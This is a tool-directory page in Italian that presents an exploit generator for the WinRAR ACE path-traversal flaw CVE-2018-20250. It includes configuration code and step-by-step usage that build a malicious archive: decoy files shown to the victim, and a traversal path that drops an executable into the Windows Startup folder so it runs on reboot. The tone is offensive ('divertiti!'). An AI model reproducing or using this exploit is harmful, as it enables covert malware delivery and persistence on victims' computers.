Skip to content
KitploitKITPLOIT
StrumentiBlog
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
CVE-2018-20250 — exp per https://research.checkpoint.com/extracting-code-execution-from-winrar | Kitploit
Strumenti/GitHubGitHub/wyatu/cve-2018-20250
Generazione di PayloadAnalisi delle VulnerabilitàExploitSfruttamento di Applicazioni WebPenetration TestingRed Teaming
GitHubwyatu/cve-2018-20250

CVE-2018-20250

exp per https://research.checkpoint.com/extracting-code-execution-from-winrar

Vedi Repository
492171127 anni faRevisionato da Kitploit

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi

exp per Estrarre l'esecuzione di codice da Winrar

poc di Ridter

Come si usa?

ti basta installare Python 3.7, preparare un file malevolo da eseguire, impostare i valori che vuoi, questo script exp genererà automaticamente il file archivio malevolo!

  1. imposta i valori che vuoi
root@kitploit:~
... ...

# The archive filename you want
rar_filename = "test.rar"
# The evil file you want to run
evil_filename = "calc.exe"
# The decompression path you want, such shown below
target_filename = r"C:\C:C:../AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\hi.exe"
# Other files to be displayed when the victim opens the winrar
# filename_list=[]
filename_list = ["hello.txt", "world.txt"]

... ...

def get_right_hdr_crc(filename):
    # This command may be different, it depends on the your Python3 environment.
    p = os.popen('py -3 acefile.py --headers %s'%(filename))
    res = p.read()
    pattern = re.compile('right_hdr_crc : 0x(.*?) | struct')
    result = pattern.findall(res)
    right_hdr_crc = result[0].upper()
    return hex2raw4(right_hdr_crc)

... ...
  1. esegui l'exp, l'exp genera automaticamente il file test.rar

  1. se la vittima apre il file test.rar, vedrà i file hello.txt e world.txt; puoi anche aggiungere altri file, file più accattivanti.

  1. quando la vittima estrae il file, nella directory di avvio dell'utente comparirà un file in più chiamato hi.exe, che in realtà è un calc.exe. al riavvio del computer, hi.exe verrà eseguito.

divertiti! :)

Scarica lo strumento